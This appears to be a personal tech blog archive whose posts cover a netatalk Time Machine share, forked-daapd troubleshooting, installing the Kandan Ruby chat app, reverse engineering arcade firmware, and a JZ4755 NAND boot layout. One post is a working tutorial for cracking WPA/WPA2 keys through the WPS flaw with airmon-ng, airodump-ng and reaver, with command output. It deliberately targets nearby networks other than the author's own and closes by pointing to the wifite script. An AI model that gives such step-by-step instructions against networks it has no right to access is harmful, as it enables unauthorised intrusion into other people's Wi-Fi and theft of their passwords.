Support

Blog

Browsing all articles in Technical Mumbo Jumbo

Flattr this!

As most of the posts out there are horribly outdated, or provide incorrect information for the current versions in use, here are my quick notes on setting up a time machine share.

First up –

apt-get install netatalk

Check /etc/netatalk/afpd.conf has something similarish to this:

# This line goes in /etc/netatalk/afpd.conf
- -tcp -noddp -uamlist uams_guest.so,uams_dhx.so,uams_dhx2.so -nosavepassword

Add a line for your required shares into /etc/netatalk/AppleVolumes.default

# Time machine share
/nas/backup/timemachine "TimeMachine" cnidscheme:dbd options:usedots,upriv,tm allow:lawrence,eugene,janice

Change the folder / names / users to your own ones obviously!
If its not going to be a time machine share, remove the “,tm”

Restart Netatalk

/etc/init.d/netatalk restart

You should be able to see the share in Time Machine Preferences.
See if you can backup. If you get a failure eg “Error 2”, make sure that the folder you use has write privileges for your user, then try again.

All in all pretty painless.

Proof it works –

Screen Shot 2013-04-01 at 1.43.08 PM

Flattr this!

I usually do most of my work these days on an Air. While its decent, it is rather dinky spacewise, and I tend to keep it empty of music so I have (barely) enough space for my dev stuff, and various embedded cross compile environments.

I still like listening to music though, so I keep that on secondary and even tertiary storage. This typically is one of the fine HP N36L / N40L NAS devices that I’m fond of buying. I have a few HP N36/N40L nas boxen in various places, some of which contain my music, but most of which contain backups, onsite, and offsite, as you can never be too careful!

I know this quite intimately, as the very machine I’m typing this on had a catastrophic SSD failure only a week ago.
Luckily I didn’t lose too much work!

Enough with the background, and back to the plot.

As I was saying, I needed some tunes to harass the staff with listen to at work.

I looked at a couple of solutions, and decided on forked-daapd, as that allegedly could share music to iTunes from the NAS music folder without too many headaches.

Most instructions were of the sort:

apt-get install forked-daapd

pico /etc/forked-daapd.conf

[edit music folder, save file]

/etc/init.d/forked-daapd restart

In my case it didn’t work.
It also didn’t really give much clue that it wasn’t working, and their website didn’t have much to go on.
I looked at compiling from scratch, but the guy making it uses Clang and Java stuff to build, and it just looked like too much hassle.

So, I had to troubleshoot even though I didn’t really want to spend the time.

My initial issue was something like the below:

forked-daapd wouldn’t run successfully (but it also didn’t complain, sigh). I could see that it wasn’t running on any port specified, and checking kern.log showed it was crapping out silently.

Mar 20 21:03:09 officenas kernel: [ 3392.026612] forked-daapd[9848] trap invalid opcode ip:7f8d8772958e sp:7f8d8176bf60 error:0 in libdispatch.so.0.0.0[7f8d87722000+c000]

Running it in the foreground showed it was having issues creating the mDNS bits.

mdns: Failed to create service browser: Bad state

This eventually worked out to editing /etc/nsswitch.conf, adding the following to the host lines:

hosts: files mdns4_minimal dns mdns4

then restarting avahi

/etc/init.d/avahi-daemon restart

This got me past the bad state error, but then it was bombing out with a missing symbol avl_alloc_tree error.

I did an strace on the thing and found it was looking for libav under /lib vs under /var/lib

This was also documented here – http://blog.openmediavault.org/?p=552&cpage=1#comment-8376, although sadly not until I found out myself.

Looks like the zfsonlinux is the culprit here, as that puts libav files in that folder. Tsk tsk.

I removed those libav files – rm /lib/libav* ****as I know what I’m doing**** (don’t randomly erase stuff unless you’re 3000% sure!), and sure enough, forked-daapd started up, and started blatting tons of output to the logs in a happy manner.
iTunes was also finally happy, and could see my music. Yay.

Took me about 2 hours to figure out sadly, but at least I sorted it out.

Hopefully this will save someone else the headache when they google for the error(s)!

Flattr this!

As my friends in high places have been talking about Ruby for a long long time now, I thought I might take a look at installing a Ruby based app on one of our servers. Sure, I could have hosted it on Heroku or similar (as I know people that know people), but I tend to do stuff in-house as China often decides to arbitrarily block useful 3rd party services at the drop of a hat.

Looked fairly simple I thought.

Bzzzt, wrong. (This is a bit of a diatribe, but hey, I have to whine somehow 😉 )

Seems Ruby has a little bit to go in terms of friendliness.

First up, was to follow the fairly simple instructions for installing the App I chose – (Kandan).

My first issue was this –


Installing eventmachine (0.12.10) with native extensions
Gem::Installer::ExtensionBuildError: ERROR: Failed to build gem native extension.

/usr/bin/ruby1.8 extconf.rb
extconf.rb:1:in `require': no such file to load -- mkmf (LoadError)
from extconf.rb:1

Gem files will remain installed in /var/lib/gems/1.8/gems/eventmachine-0.12.10 for inspection.
Results logged to /var/lib/gems/1.8/gems/eventmachine-0.12.10/ext/gem_make.out
An error occurred while installing eventmachine (0.12.10), and Bundler cannot continue.
Make sure that `gem install eventmachine -v '0.12.10'` succeeds before bundling.

Hmm, mkmf, whats that?

No idea, lets take a quick look at apt-cache.
Ok, so looks like we need ruby headers to compile.

A quick look google shows that at RubyForge shows that this has been an issue since oh, at least 2005.

http://rubyforge.org/forum/forum.php?thread_id=4161&forum_id=4050

Perhaps a nicer message might be – “Hey, I see you don’t have the ruby development headers installed, install some”, and maybe even download them.

Even Perl is more user friendly than that when it comes to missing libraries, and Perl is famous for being obscure.

Once I overcame that minor hurdle, the installer trundled away merrily, and failed on the next message

Gem::InstallError: cloudfuji_paperclip requires Ruby version >= 1.9.2.
An error occurred while installing cloudfuji_paperclip (3.0.3), and Bundler cannot continue.
Make sure that `gem install cloudfuji_paperclip -v '3.0.3'` succeeds before bundling.

Debian has Ruby 1.91, and Ruby 1.8 in stable.
*and* the previous compiled gem (eventmachine) required 1.8 specifically.
I’m already smelling versionitis…

[more wizened geeks will say apologetic things like:

#1 ah, but yes there is rb!
– Yes, but I’m coming at this from a fresh angle, and I don’t necessarily know about that.

#2 This is quite debian specific!
– Yes, but it is a rather major distro..
]

Lets see whats available from testing repo.

apt-cache search -t testing ^ruby | grep 1.9

...
ruby1.9.1 - Interpreter of object-oriented scripting language Ruby
ruby1.9.1-dev - Header files for compiling extension modules for the Ruby 1.9.1
ruby1.9.1-examples - Examples for Ruby 1.9
ruby1.9.1-full - Ruby 1.9.1 full installation
ruby1.9.3 - Interpreter of object-oriented scripting language Ruby, version 1.9.3

Ok, so 1.9.3 should do it, lets install that.


apt-get install -t testing ruby1.9.3

Re-run the Bundle installer, and…


Installing cloudfuji_paperclip (3.0.3)
Gem::InstallError: cloudfuji_paperclip requires Ruby version >= 1.9.2.
An error occurred while installing cloudfuji_paperclip (3.0.3), and Bundler cannot continue.
Make sure that `gem install cloudfuji_paperclip -v '3.0.3'` succeeds before bundling.

Hmm…
Lets double check.


> ruby --version
ruby 1.9.3p194 (2012-04-20 revision 35410) [x86_64-linux]

Lets see. Ruby 1.9.3 >= 1.9.2 in my math book, so wtf.

I can even install it fine manually, via “gem install cloudfuji_paperclip -v ‘3.0.3’” so its really full of poop.

I decide to take a different tack –
Looking at the gems folder though, I don’t see the gem libraries for 1.9.3 there, so I guess Ruby is full of crap again, and lying about the error, although then why does building the gem manually NOT fail. Sigh.

I decided to take the rvm route

https://rvm.io -> curl -L https://get.rvm.io | bash -s stable –ruby

then

source /etc/profile.d/rvm.sh

(still need to add to apache www-data group, but first lets get this compiled)

rvm trundled away and installed 1.9.3 gems, so that *finally* cloudfuji_paperclip wasn’t bitching.

…and we get to the next error.

An error occurred while installing pg (0.12.2), and Bundler cannot continue.
Make sure that `gem install pg -v '0.12.2'` succeeds before bundling.

I run that manually, and

gem install pg -v '0.12.2'
Building native extensions. This could take a while...
ERROR: Error installing pg:
ERROR: Failed to build gem native extension.

/usr/local/rvm/rubies/ruby-1.9.3-p374/bin/ruby extconf.rb
checking for pg_config... no
No pg_config... trying anyway. If building fails, please try again with
--with-pg-config=/path/to/pg_config
checking for libpq-fe.h... no
Can't find the 'libpq-fe.h header

apt-get install libpq-dev solves that one.

…and

bombing on sqlite.

apt-get install sqlite3

retry

Its at this point I start thinking about puppet and how that does dependencies in a graceful manner, but I digress.

..and because I forget the development libraries, I need to also get those.

apt-get install libsqlite3-dev

Retry the bundle install, and *finally* getting a build.

Oh joy.

So, lets try run it.

bundle exec rake db:create db:migrate kandan:bootstrap

== CreateAttachments: migrating ==============================================
-- create_table(:attachments)
-> 0.0015s
== CreateAttachments: migrated (0.0016s) =====================================

== AddSessionsTable: migrating ===============================================
-- create_table(:sessions)
-> 0.0011s
-- add_index(:sessions, :session_id)
-> 0.0004s
-- add_index(:sessions, :updated_at)
-> 0.0004s
== AddSessionsTable: migrated (0.0020s) ======================================

== DeviseCreateUsers: migrating ==============================================
-- create_table(:users)
-> 0.0435s
-- add_index(:users, :email, {:unique=>true})
-> 0.0005s
-- add_index(:users, :ido_id, {:unique=>true})
-> 0.0005s
-- add_index(:users, :authentication_token, {:unique=>true})
-> 0.0005s
== DeviseCreateUsers: migrated (0.0452s) =====================================

== CreateChannels: migrating =================================================
-- create_table(:channels)
-> 0.0011s
== CreateChannels: migrated (0.0011s) ========================================

== CreateActivities: migrating ===============================================
-- create_table(:activities)
-> 0.0012s
== CreateActivities: migrated (0.0013s) ======================================

== AddGravatarHashToUsers: migrating =========================================
-- add_column(:users, :gravatar_hash, :text)
-> 0.0007s
== AddGravatarHashToUsers: migrated (0.0007s) ================================

== AddActiveToUsers: migrating ===============================================
-- add_column(:users, :active, :boolean, {:default=>true})
-> 0.0007s
== AddActiveToUsers: migrated (0.0007s) ======================================

Creating default user...
Creating default channel...
rake aborted!
undefined method `to_i' for #
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activemodel-3.2.11/lib/active_model/attribute_methods.rb:407:in `method_missing'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/attribute_methods.rb:149:in `method_missing'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/connection_adapters/column.rb:178:in `value_to_integer'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/connection_adapters/column.rb:78:in `type_cast'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/attribute_methods/dirty.rb:86:in `_field_changed?'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/attribute_methods/dirty.rb:63:in `write_attribute'
/usr/local/rvm/gems/ruby-1.9.3-p374/gems/activerecord-3.2.11/lib/active_record/attribute_methods/write.rb:14:in `channel_id='
/home/cubieboard/chat/kandan/lib/tasks/kandan.rake:35:in `block (3 levels) in '
/home/cubieboard/chat/kandan/lib/tasks/kandan.rake:23:in `each'
/home/cubieboard/chat/kandan/lib/tasks/kandan.rake:23:in `block (2 levels) in '
/usr/local/rvm/gems/ruby-1.9.3-p374/bin/ruby_noexec_wrapper:14:in `eval'
/usr/local/rvm/gems/ruby-1.9.3-p374/bin/ruby_noexec_wrapper:14:in `

'
Tasks: TOP => kandan:bootstrap
(See full trace by running task with --trace)

Oh look, *what* a suprise. Another error.
I’m starting to think that nobody actually tests this stuff in real life.

undefined method `to_i’

A bit of googling, and it looks like Ruby has changed functionality, and broken things in 3.2.3

See – http://stackoverflow.com/questions/13348980/activerecord-to-i-method-removed-in-rails-3-2-9

Plus, there are some security issues to in Rails (of course).

*and* Kandan guys have cancelled it.

However someone else has forked it, and is updating it.

So, lets wipe all of that, and start again, shall we.

-> https://github.com/kandanapp/kandan

cd ..
rm -r kandan –with-prejudice
git clone https://github.com/kandanapp/kandan

edit the config/database.yaml

Add some sqlite3 (hey, the rest is, and at this point I just want something testable, I can tweak later).

production:
adapter: sqlite3
host: localhost
database: db/production.sqlite3
pool: 5
timeout: 5000

save.

exec rake db:create db:migrate kandan:bootstrap

Done. Yay.

Now to test.

bundle exec thin start
>> Using rack adapter
>> Thin web server (v1.3.1 codename Triple Espresso)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:3000, CTRL+C to stop

Ok, now *thats* finally working, I just need to setup a apache_proxy to that port on the actual url it will be sitting on, and finally it should work.

*Famous last words*.

Way more painful than it really needed to be. Grr…

Flattr this!

Assuming all the tools are installed (http://code.google.com/p/reaver-wps/)

Reaver is an attack on WPA/WPA2 using a vulnerability in the WPS mechanism.

First up, we need to find out what our network cards are called, so use iwconfig to list wifi / network interfaces

eg

iwconfig

iwconfig
lo no wireless extensions.

wlan1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on

eth0 no wireless extensions.

wlan3 IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on

In the above, we have wlan1 and wlan3 as possible interfaces.

Next up, we put the wifi card into monitor mode (pick a card)
Here I’m using wlan1

airmon-ng start

airmon-ng start wlan1

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1791 avahi-daemon
1792 avahi-daemon

Interface Chipset Driver

wlan1 Unknown rt2800usb - [phy0]
(monitor mode enabled on mon0)
wlan3 RTL8187 rtl8187 - [phy3]

That creates another interface (mon0 above), that we can connect to.
Next, we need to list the various wifi lans in the vicinity

We can use the new interface to do so (or use any existing wifi interface, doesn’t really matter)


airodump-ng mon0

CH 13 ][ Elapsed: 20 s ][ 2012-10-20 08:39

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

EC:17:2F:F3:0F:A8 -35 21 241 0 7 54e WPA2 CCMP PSK First_Network
00:18:39:28:3B:2C -72 9 0 0 5 54 . WPA2 CCMP PSK Second_Network
00:25:BC:8D:4F:F5 -75 5 4 0 11 54e. WPA2 CCMP PSK Third_Network

BSSID STATION PWR Rate Lost Packets Probes

EC:17:2F:F3:0F:A8 74:E2:F5:4D:C5:11 -1 0e- 0 0 2
EC:17:2F:F3:0F:A8 00:04:20:16:5E:52 -52 48 -54 0 14
EC:17:2F:F3:0F:A8 70:56:81:C2:1B:3B -66 0e- 1e 0 6
EC:17:2F:F3:0F:A8 00:23:4E:7E:FC:B4 -74 0e- 1 0 3
EC:17:2F:F3:0F:A8 00:08:65:30:93:D3 -76 36 -12e 0 217

Here you can see that the interface see’s 3 separate networks.
It can also identify that First_Network has connections from a number of computers

Ideally, we want to sniff the network with the most traffic, in this case, thats my existing network, so we’ll skip it.

We can see that Second_Network is on Channel 5, and Third_Network is on channel 11

Now we have enough information to try to discover the key for the other networks.

Startup reaver, and connect to a BSSID above

reaver -i mon0 -b BSSID -a -vv -c CHANNEL

BSSID’s –
00:18:39:28:3B:2C – Second_Network Channel 5
00:25:BC:8D:4F:F5 – Third_Network Channel 11

eg


reaver -i mon0 -b 00:25:BC:8D:4F:F5 -vv -a -c11

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 00:25:BC:8D:4F:F5

This should connect to the network, and start to do its magic.

If you get issues like

[!] WARNING: Failed to associate with 00:25:BC:8D:4F:F5 (ESSID: Third_Network)

Then you need to try another with another wifi card chipset, as your drivers don’t support monitor mode correctly.

If it does connect, then you’re set. Let it run, and a few hours later, you should see the wifi name and password.

A much easier way to do all this, is of course to use the prepackaged scripts at

http://code.google.com/p/wifite/

wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

chmod +x wifite.py

./wifite.py

Then have fun..

Flattr this!

Someone from the JammaForums.co.uk emailed me a copy of the firmware in their SD card from a XinYe 138 in 1.

Card looks something like this:

I don’t have one, but I took a quick look at the data provided, and it looks fairly straightforward to “hack”.

It actually took me less than 30 minutes to have most of the good bits extracted from receiving the file!

There are 2 files on the SD card.

One is a 64 byte file called sn.bin which contains this data:

This looks suspiciously like a header, but I haven’t taken a clear look.

The second file is called x3rodl.bin, and contains a Linux firmware in ARM format.

The first few hundred bytes look like this:

Its obviously in ARM format, as the first set of bytes are ARM no-op codes.

00 00 A0 E1, which repeats 8 times.
02 00 00 EA, then…
18 28 6F 01 – Which is a magic word indicating that this contains a zImage (compressed Linux kernel)

18 28 6F 01 = 0x016f2818

Linux code looks something like this for identifying if its a kernel:

if (*(ulong *)(to + 9*4) != LINUX_ZIMAGE_MAGIC) {
printk("Warning: this binary is not compressed linux kernel image/n");
printk("zImage magic = 0x%08lx/n", *(ulong *)(to + 9*4));
} else {
printk("zImage magic = 0x%08lx/n", *(ulong *)(to + 9*4));
}

9 * 4 = 36, which is our location, and this happens to have our magic number.
So, we know its a kernel. Its also probably the VIVI bootloader from Samsung, as that uses that style MAGIC.

The following bits of data, contain the setup for the kernel, and the boot code.

This continues on until the compressed kernel+ramdisk. That starts with 1F 8B 08 (gzip header bytes) over at 0x3EF2, until roughly the end of the file.

I extracted that part and had a quick look.
Its about 7.7M size unpacked.

Linux version is: 2.6.36-FriendlyARM

Boot params are:
console=ttySAC0,115200 root=/dev/ram init=/linuxrc initrd=0x51000000,6M ramdisk_size=6144

RAMDISK File System starts at 0x20000, and looks like this:

lawrence$ ls -al
total 24
drwxr-xr-x 13 lawrence staff 442 Jun 17 23:09 .
drwxr-xr-x 4 lawrence staff 136 Jun 17 23:08 ..
drwxr-xr-x 51 lawrence staff 1734 Jun 17 23:09 bin
drwxr-xr-x 2 lawrence staff 68 Jun 17 23:09 dev
drwxr-xr-x 11 lawrence staff 374 Jun 17 23:09 etc
-rwxr-xr-x 1 lawrence staff 3821 Jun 17 23:09 init
-rw-r--r-- 1 lawrence staff 3821 Jun 17 23:09 init~
lrwxrwxrwx 1 lawrence staff 11 Jun 17 23:09 linuxrc -> bin/busybox
drwxr-xr-x 2 lawrence staff 68 Jun 17 23:09 proc
drwxr-xr-x 2 lawrence staff 68 Jun 17 23:09 r
drwxr-xr-x 19 lawrence staff 646 Jun 17 23:09 sbin
drwxr-xr-x 2 lawrence staff 68 Jun 17 23:09 sdcard
drwxr-xr-x 4 lawrence staff 136 Jun 17 23:09 usr

The bootup script for this looks like this:


#! /bin/sh

PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=S
prevlevel=N
umask 022
export PATH runlevel prevlevel

echo st.

#
# Trap CTRL-C &c only in this shell so we can interrupt subprocesses.
#
trap ":" INT QUIT TSTP
/bin/hostname FriendlyARM
/bin/mount -n -t proc proc /proc

cmdline=`cat /proc/cmdline`

ROOT=none
ROOTFLAGS=
ROOTFSTYPE=
NFSROOT=
IP=
INIT=/sbin/init
#run_fs_image=/images/linux/rootfs_xin1arm_sdhotplug.ext3

for x in $cmdline ; do
case $x in
root=*)
ROOT=${x#root=}
;;
rootfstype=*)
ROOTFSTYPE="-t ${x#rootfstype=}"
;;
rootflags=*)
ROOTFLAGS="-o ${x#rootflags=}"
;;
init=*)
INIT=${x#init=}
;;
nfsroot=*)
NFSROOT=${x#nfsroot=}
;;
ip=*)
IP=${x#ip=}
;;

esac
done

if [ ! -z $NFSROOT ] ; then
echo $NFSROOT | sed s/:/\ /g > /dev/x ; read sip dir < /dev/x echo $IP | sed s/:/\ /g > /dev/x; read cip sip2 gip netmask hostname device autoconf < /dev/x rm /dev/x #echo $sip $dir $cip $sip2 $gip $netmask $hostname $device $autoconf mount -t nfs $NFSROOT /r -o nolock,proto=tcp #[ -e /r/dev/console ] || exec /bin/sh elif [ ! -z $run_fs_image ] ; then #lilxc #echo $run_fs_image echo sdroot. if [ ! -e /dev/mmcblk0p2 ] ; then echo "p2 not found." reboot sleep 5 fi ROOTFSTYPE="-t ext3" for i in 1 2 3 4 5 ; do #/bin/mount -n -o sync -o noatime -o nodiratime -o ro -t vfat /dev/mmcblk0p1 /sdcard && break /bin/mount -n -o sync -o noatime -o nodiratime -o ro -t ext3 /dev/mmcblk0p2 /sdcard && break echo Waiting for SD Card... if [ $i = 4 ] ; then echo " p2 failed. " reboot sleep 5 break; fi sleep 1 done #echo ------begin---------------------------------------- #sleep 1 #lilxc #ls -l /dev #sleep 1 #echo ----------------------------------------------- #ls -l /sdcard #sleep 1 #echo ------end------------------------------------------ #/sbin/losetup /dev/loop0 /sdcard/$run_fs_image #/bin/mount $ROOTFSTYPE /dev/loop0 /r #/bin/mount $ROOTFSTYPE -o noatime -o nodiratime -o ro /dev/mmcblk0p2 /r > /dev/null 2>&1
/bin/mount $ROOTFSTYPE -n -o noatime -o nodiratime -o ro /dev/mmcblk0p3 /r > /dev/null 2>&1
mount -o move /sdcard /r/sdcard
#/sbin/losetup /dev/loop1 /r/sdcard/swap
#/sbin/swapon /dev/loop1

else
# /bin/mount -n $ROOTFLAGS $ROOTFSTYPE $ROOT /r
# echo "Readonly mount...(lilxc)"
# mount -n -t yaffs2 -o noatime -o nodiratime -o ro /dev/mtdblock2 /r
# mount -n -t yaffs2 -o noatime -o nodiratime /dev/mtdblock2 /r

mount -n -t yaffs2 -o noatime -o nodiratime -o ro /dev/mtdblock2 /r

if [ -e /r/home/plg/reboot ]; then
umount /r
mount -n -t yaffs2 -o noatime -o nodiratime /dev/mtdblock2 /r
fi

fi

ONE_WIRE_PROC=/proc/driver/one-wire-info
ETC_BASE=/r/etc
[ -d /r/system/etc ] && ETC_BASE=/r/system/etc
[ -e $ETC_BASE/ts.detected ] && . $ETC_BASE/ts.detected
[ -z $CHECK_1WIRE ] && CHECK_1WIRE=Y
if [ $CHECK_1WIRE = "Y" -a -e $ONE_WIRE_PROC ] ; then
if read lcd_type fw_ver tail < $ONE_WIRE_PROC ; then if [ x$lcd_type = "x0" -a x$fw_ver = "x0" ] ; then TS_DEV=/dev/touchscreen else TS_DEV=/dev/touchscreen-1wire echo "1Wire touchscreen OK" fi if [ -e $ETC_BASE/friendlyarm-ts-input.conf ]; then sed "s:^\(TSLIB_TSDEVICE=\).*:\1$TS_DEV:g" $ETC_BASE/friendlyarm-ts-input.conf > $ETC_BASE/ts-autodetect.conf
mv $ETC_BASE/ts-autodetect.conf $ETC_BASE/friendlyarm-ts-input.conf -f
echo "CHECK_1WIRE=N" > $ETC_BASE/ts.detected
fi
fi
fi

[ -e /r/etc/friendlyarm-ts-input.conf ] && . /r/etc/friendlyarm-ts-input.conf
[ -e /r/system/etc/friendlyarm-ts-input.conf ] && . /r/system/etc/friendlyarm-ts-input.conf
export TSLIB_TSDEVICE

#lilxc debug here
#/bin/mount -n -o sync -o noatime -o nodiratime -t vfat /dev/mmcblk0p1 /sdcard
#cp /sdcard/lktcmd /r/tmp
#exec /bin/sh

# for running game
umount /proc
exec switch_root /r $INIT /r/dev/console 2>&1

The secondary loader in init looks like this:

#! /bin/sh

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:
runlevel=S
prevlevel=N
umask 022
export PATH runlevel prevlevel

#
# Trap CTRL-C &c only in this shell so we can interrupt subprocesses.
#
trap ":" INT QUIT TSTP
/bin/hostname FriendlyARM

[ -e /proc/1 ] || /bin/mount -n -t proc none /proc
[ -e /sys/class ] || /bin/mount -n -t sysfs none /sys
[ -e /dev/tty ] || /bin/mount -t ramfs none /dev
/bin/mount -n -t usbfs none /proc/bus/usb

echo /sbin/mdev > /proc/sys/kernel/hotplug
/sbin/mdev -s
/bin/hotplug
# mounting file system specified in /etc/fstab
mkdir -p /dev/pts
mkdir -p /dev/shm
/bin/mount -n -t devpts none /dev/pts -o mode=0622
/bin/mount -n -t tmpfs tmpfs /dev/shm
/bin/mount -n -t ramfs none /tmp
/bin/mount -n -t ramfs none /var
mkdir -p /var/empty
mkdir -p /var/log
mkdir -p /var/lock
mkdir -p /var/run
mkdir -p /var/tmp

/sbin/hwclock -s

echo " " > /dev/tty1
echo "System starting... " > /dev/tty1
syslogd

#/etc/rc.d/init.d/netd start
#echo " " > /dev/tty1
#echo "Starting networking..." > /dev/tty1
#sleep 1
#/etc/rc.d/init.d/httpd start
#echo " " > /dev/tty1
#echo "Starting web server..." > /dev/tty1
#sleep 1
#/etc/rc.d/init.d/leds start
#echo " " > /dev/tty1
#echo "Starting leds service..." > /dev/tty1
#echo " "
#sleep 1

/etc/rc.d/init.d/mkjoy
#echo " " > /dev/tty1
#echo "System Starting... " > /dev/tty1
#echo " " > /dev/tty1

#echo " " > /dev/tty1
/etc/rc.d/init.d/alsaconf start
#echo "Loading sound card config..." > /dev/tty1
#echo " "

#/sbin/ifconfig lo 127.0.0.1
#/etc/init.d/ifconfig-eth0

#/bin/qtopia &
#echo " " > /dev/tty1
#echo "Starting Qtopia, please waiting..." > /dev/tty1

cd /sdcard
./run.sh
reboot

Fairly easy to reverse!

Refs:
http://www.jammaplus.co.uk/
http://blog.csdn.net/liangkaiming/article/details/6259189

Flattr this!

Following up from my previous posts on this, looks like my idea’s are correct about the size of the NAND for setup, and my NAND read stuff works. Yay for me.

Lets recap:

JZ4755 boot sequence is as follows:

CPU powers up.
Checks BOOT_SEL line, takes appropriate action.

boot_sel[1:0]
00 Unused
01 Initialization via USB port: Receives a block of data through the USB (device) port,
and stores it in internal SRAM.
10 Initialization via NAND memory with 512-byte pages at Chip Select 1 (CS1):
11 Initialization via NAND memory with 2048-byte pages at Chip Select 1 (CS1):

In our board, if we press BOOT, this pulls the pin low, so CPU see’s 01, and waits for an IPL from USB.
If we leave it to boot normally, then it reads from NAND.

So far so good.

Lets see if anyone was watching carefully 🙂
Our board NAND chip has a page size of 8192+OOB
Our *CPU Hardware* supports either 512bytes or 2048bytes page size on boot.
Our IPL (aka NAND.BIN) must be 8K in size or less, as the CPU has 8k only, and it copies the bootloader to that obeying BOOT_SEL.

Lets look at what happens.

If I read out the NAND (NREAD 0 8192 0 0) with our carefully set sizing, I see the following:

0000 - 2047 (2k in size) - DATA FF 55 55 .. 02 00 0C
2048 - 2549 (512bytes in size) - BLANK
2560 - 4607 (2k in size) - DATA (padded at end with FF's to 2k size) 21 20 00 .. 85 8c 90+ FF -> 2048 end
4608 - 6655 (2k in size) - DATA (padded at end with FF's to 2k size)

So, we have roughly about 6k odd of data, out of our 8k max. Its a bit weirdly laid out though, and has some holes in there, so its _not_ correct 🙁

Lets look at the RAW NAND DUMP (NREAD_RAW 0 8192 0 0). Our raw page size is 8192.

Page 0
00000 - 02047 (2k in size) - DATA FF 55 55 .. 02 00 0C (same as before)
02048 - 02102 (55 bytes) - (presumed OOB / ECC stuff...) NEW
Page 1
08192 - 10239 (2k in size) - DATA 21 20 00 .. 10 80 00. Our 85 8c 90 above is actually part of the 55byte sequence, so definitely our NREAD is incorrect, as we're suddenly short data.
10240 - 10294 (55 bytes ) - (presumed OOB / ECC stuff...) NEW
Page 2
16384 - 18431 (2k in size) - DATA (padded with 0's from 17892 - 18431), so our NAND loader data is roughly 5.5KBish.
18432 - 18486 (55 bytes ) - (presumed OOB / ECC stuff...) NEW
Page 3
25026 onwards FF's - so uninitialized.

So, with that, we know that NREAD doesn’t quite work for our first 4 pages (page 0 – 3), and we either need to NREAD_RAW, or possibly use a 2048byte page size in order to read the NAND.BIN properly.

Thats only necessary for the first 4 pages in the NAND though.
Once the NAND.BIN MINIOS bootstrap is running, it should be able to cope with our proper data size.

How does it do that though?

MINIOS Bootloader starts up, as it gets added to the CPU boot sequence detailed above, then it looks for 3 things in 3 places 🙂

Our mystery locations for that are:

Page 61
Page 62
Page 63

Page 61 contains our NAND size stuff, which as we know from above, our Bootloader *can’t* use, as its only 2k or 512byte set at the hardware level initially.

Page 61 in mine has 12 bytes. This looks exceedingly good as I know that my work is, er, working 🙂

USBBoot :> nreadraw 61 24 0 0
Reading RAW from No.0 device No.0 flash....
0x00000000 :00 20 00 00 c0 01 00 00 00 01 00 00

00 20 00 00 = 8192 PAGE SIZE
c0 01 00 00 = 448 OOBSIZE
00 01 00 00 = 256 PAGE PER BLOCK

Lets look at the 3 bytes.

First 16bit word is = 8192 – thats our Page Size
Second 16bit word is = 448 – thats our OOB size (oob = out of block, usually used for CRC or Error etc, as NAND can go BAD if you write to it frequently)
Third 16bit word is = 256 – thats how many pages per block we have.

Block 61, and Block 62 are the same. Basically 62 is a backup of 61. If the NAND.BIN MINIOS loader can’t read Block 61 12 bytes, it tries Block 62. If neither work, you’ll need to reflash, or replace the NAND…

Block 63 contains a whole 10 bytes. This is the UID of the device. Mine is set to 0. Lazy buggers 🙂

Ok, so now we booted, and the MINIOS bootstraploader / NAND.BIN has read our NAND size, then what?

Well, you’ll need to disassemble the code to see (eg as part of my previous post), but essentially it calls the next thing in line.

This can be Linux, or something else. In the board, the OS used is MINIOS, so it loads something else – aka MINIOS.

MINIOS is actually uCOS-II – You can find details on that from Micrium, as they licence it out.
Ingenic has a custom version of uCOS-II for their board. uCOS-II is also a RTOS (Real Time OS).

You can read more on MINIOS here – http://en.wikipedia.org/wiki/MicroC/OS-II

Anyway, lets get back to work, and less chatter 🙂

NAND.BIN passes control onto whatever is sitting at Page 128 (this can be changed, but in the JAMMA board, and in the GameBox GBX-0001), the next loader is at Page 128.

As I don’t have much info on the MINIOS side, I got a lot of this info from other places. Mostly the MINIOS_CFG.INI in the Ingenic FTP Site, plus some gracious help from Joseba Epalza (thanks!) at www.zonadepruebas.com. He supplied a Gamebox dump, and asked me a few questions, which made me re-examine things, which was extremely useful as then I could bounce idea’s and findings off of someone else.

The Gamebox hardware and the Jamma hardware is extremely similar, so the NAND dump in both is good for both of us to double check each others work. Unfortunately, I don’t speak Portuguese Spanish, so we both relied on Google Translate to talk via email today, but we seem to be doing ok 🙂

Onto the tech side again, our secondary loader is, in MINIOS terms, called LOADER.BIN

This sits at Page 128
LOADER.BIN tries to read a file called DEF_BOOT.BIN for configuration settings, as that tells LOADER.BIN where the rest of the filesystem is!

In theory, Page 256 contains
DEF_BOOT.BIN

I need to go back and recheck that now, as my dumps are a bit messy, and I need to check on actual hardware, vs the many whoops I renamed that wrong files I now have messing up my desktop.
I also need to check if I need to read as 2k block size/or raw to get the correct data in these pages, as one place online says that the secondary bootloader (LOADER.BIN) also assumes 2k size.

Other bits:

IMG_BOOT.BIN – bootup code if used.
MINIOS.BIN – the OS.
RES.BIN – Resources used by MINIOS.BIN

The rest… (FAT16 Filesystem which is readable over USB via normal boot)

Ignoring my first 8k not quite correct dumped dumps + possibly borked secondary loader stuff, the rest of the data dump looks accurate.

I have what looks like RES.BIN stuff, I have a MINIOS, and I can see interesting things.

Interesting things below:

Dump pos 0x100200 - seems to have the RES.BIN filesystem in mine -

mobile_tv.bin
